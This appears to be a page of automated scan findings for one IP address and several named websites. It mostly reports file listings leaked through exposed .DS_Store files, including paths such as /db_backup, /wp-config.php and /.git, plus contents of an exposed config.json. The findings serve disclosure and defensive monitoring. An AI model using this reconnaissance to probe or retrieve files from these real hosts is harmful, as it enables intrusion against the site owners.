Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a3ea984250374ee6c088f5e668bf565ae0Found 43 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /uploads/404.jpg /uploads/ads /uploads/country /uploads/default_image /uploads/default_image_flix /uploads/episodes /uploads/genre /uploads/home /uploads/index.html /uploads/landing_page /uploads/no_image.jpg /uploads/player_watermark.jpg /uploads/player_watermark.png /uploads/poster_image /uploads/sliders /uploads/star_image /uploads/subtitles /uploads/system_logo /uploads/temp /uploads/tv_image /uploads/user.jpg /uploads/user_image /uploads/video_thumb /uploads/videos /uploads/watermark_logo.jpg /uploads/watermark_logo.png /web.config
Found on 2022-10-04 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-04 17:48
Last seen 2023-02-03 18:23
Open for 122 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec4ae42b03279222b556b12ab3a697a6c2Found 17 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /web.config
Found on 2022-10-04 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-04 17:48
Last seen 2023-02-03 18:23
Open for 122 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec4ae42b03279222b556b12ab3a697a6c2Found 17 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /web.config
Found on 2022-10-04 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-04 17:48
Last seen 2023-02-03 18:23
Open for 122 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec4ae42b03279222b556b12ab3a697a6c2Found 17 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /web.config
Found on 2022-10-04 17:48
-
-
A JSON configuration file has been found
A JSON configuration file has been found at
config.json.It may contains application configuration such as credentials.
False positive might happen when hitting a JSON API endpoint.
IP: 162.241.253.33
Domain: www.study.smarttradingguide.com
Port: 443
URL: https://www.study.smarttradingguide.comFirst seen 2023-01-22 18:26-
Fingerprint: b18befd9dd6536aa30550de5b99dd8a1b5467cb405aba7dae7c689f0d1486f73
{ "version": "5.5.0", "min": "5.4.0", "release_date": "27/12/2022", "migrations": [ "Modules/ModuleManager/Database/Migrations/2022_12_14_165834_AddInAppLiveClassModule.php", "Modules/VirtualClass/Database/Migrations/2022_12_15_113802_ChangeHostDataTypeInVirtuleClass.php", "Modules/VirtualClass/Database/Migrations/2022_12_18_114845_AddSettingInVirtaulClass.php", "Modules/ModuleManager/Database/Migrations/2022_12_19_095603_AddNoticeboardModule.php", "Modules/RolePermission/Database/Migrations/2022_12_27_140151_removeDoublePermission.php" ], "url": "https://www.aorasoft.com/", "notes": "This is a bug fixing & new feature update." }Found on 2023-01-22 18:26
-
-
A JSON configuration file has been found
A JSON configuration file has been found at
config.json.It may contains application configuration such as credentials.
False positive might happen when hitting a JSON API endpoint.
IP: 162.241.253.33
Domain: www.study.smarttradingguide.com
Port: 80
URL: http://www.study.smarttradingguide.comFirst seen 2023-01-22 18:26-
Fingerprint: b18befd9dd6536aa30550de5b99dd8a1b5467cb405aba7dae7c689f0d1486f73
{ "version": "5.5.0", "min": "5.4.0", "release_date": "27/12/2022", "migrations": [ "Modules/ModuleManager/Database/Migrations/2022_12_14_165834_AddInAppLiveClassModule.php", "Modules/VirtualClass/Database/Migrations/2022_12_15_113802_ChangeHostDataTypeInVirtuleClass.php", "Modules/VirtualClass/Database/Migrations/2022_12_18_114845_AddSettingInVirtaulClass.php", "Modules/ModuleManager/Database/Migrations/2022_12_19_095603_AddNoticeboardModule.php", "Modules/RolePermission/Database/Migrations/2022_12_27_140151_removeDoublePermission.php" ], "url": "https://www.aorasoft.com/", "notes": "This is a bug fixing & new feature update." }Found on 2023-01-22 18:26
-
-
A JSON configuration file has been found
A JSON configuration file has been found at
config.json.It may contains application configuration such as credentials.
False positive might happen when hitting a JSON API endpoint.
IP: 162.241.253.33
Domain: study.smarttradingguide.com
Port: 443
URL: https://study.smarttradingguide.comFirst seen 2023-01-22 18:26-
Fingerprint: b18befd9dd6536aa30550de5b99dd8a1b5467cb405aba7dae7c689f0d1486f73
{ "version": "5.5.0", "min": "5.4.0", "release_date": "27/12/2022", "migrations": [ "Modules/ModuleManager/Database/Migrations/2022_12_14_165834_AddInAppLiveClassModule.php", "Modules/VirtualClass/Database/Migrations/2022_12_15_113802_ChangeHostDataTypeInVirtuleClass.php", "Modules/VirtualClass/Database/Migrations/2022_12_18_114845_AddSettingInVirtaulClass.php", "Modules/ModuleManager/Database/Migrations/2022_12_19_095603_AddNoticeboardModule.php", "Modules/RolePermission/Database/Migrations/2022_12_27_140151_removeDoublePermission.php" ], "url": "https://www.aorasoft.com/", "notes": "This is a bug fixing & new feature update." }Found on 2023-01-22 18:26
-
-
A JSON configuration file has been found
A JSON configuration file has been found at
config.json.It may contains application configuration such as credentials.
False positive might happen when hitting a JSON API endpoint.
IP: 162.241.253.33
Domain: study.smarttradingguide.com
Port: 80
URL: http://study.smarttradingguide.comFirst seen 2023-01-22 18:26-
Fingerprint: b18befd9dd6536aa30550de5b99dd8a1b5467cb405aba7dae7c689f0d1486f73
{ "version": "5.5.0", "min": "5.4.0", "release_date": "27/12/2022", "migrations": [ "Modules/ModuleManager/Database/Migrations/2022_12_14_165834_AddInAppLiveClassModule.php", "Modules/VirtualClass/Database/Migrations/2022_12_15_113802_ChangeHostDataTypeInVirtuleClass.php", "Modules/VirtualClass/Database/Migrations/2022_12_18_114845_AddSettingInVirtaulClass.php", "Modules/ModuleManager/Database/Migrations/2022_12_19_095603_AddNoticeboardModule.php", "Modules/RolePermission/Database/Migrations/2022_12_27_140151_removeDoublePermission.php" ], "url": "https://www.aorasoft.com/", "notes": "This is a bug fixing & new feature update." }Found on 2023-01-22 18:26
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-24 17:52
Last seen 2022-12-24 18:37
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-24 17:52
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-24 17:52
Last seen 2022-12-24 18:37
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-24 17:52
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-23 01:07-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-23 01:07
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:34
Last seen 2022-12-23 01:07
Open for 63 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-20 18:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: lumbralmexico.monasteriourbano.com
Port: 80
URL: http://lumbralmexico.monasteriourbano.comFirst seen 2022-10-20 18:34
Last seen 2022-12-23 01:07
Open for 63 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-20 18:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.lumbralmexico.monasteriourbano.com
Port: 80
URL: http://www.lumbralmexico.monasteriourbano.comFirst seen 2022-10-20 18:34
Last seen 2022-12-23 01:07
Open for 63 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-20 18:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:34
Last seen 2022-12-23 01:07
Open for 63 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-20 18:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2022-12-22 18:47
Open for 62 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2022-12-22 18:47
Open for 62 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2022-12-22 18:47
Open for 62 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2022-12-22 18:47
Open for 62 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2022-12-22 18:47
Open for 62 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:14
Last seen 2022-12-21 18:50
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:14
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:14
Last seen 2022-12-21 18:50
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:14
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:14
Last seen 2022-12-21 18:50
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:14
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-21 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-21 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-21 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-21 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:02
Last seen 2022-12-21 18:39
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:02
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: jaynesimon.austynelizabeth.com
Port: 80
URL: http://jaynesimon.austynelizabeth.comFirst seen 2022-10-21 18:02
Last seen 2022-12-21 18:39
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:02
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:39-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-21 18:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:39-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-12-21 18:39
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.jaynesimon.austynelizabeth.com
Port: 80
URL: http://www.jaynesimon.austynelizabeth.comFirst seen 2022-10-21 18:02
Last seen 2022-12-21 18:39
Open for 61 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-10-21 18:02
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-18 18:41-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2022-12-18 18:41
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-18 18:41-
Severity: medium
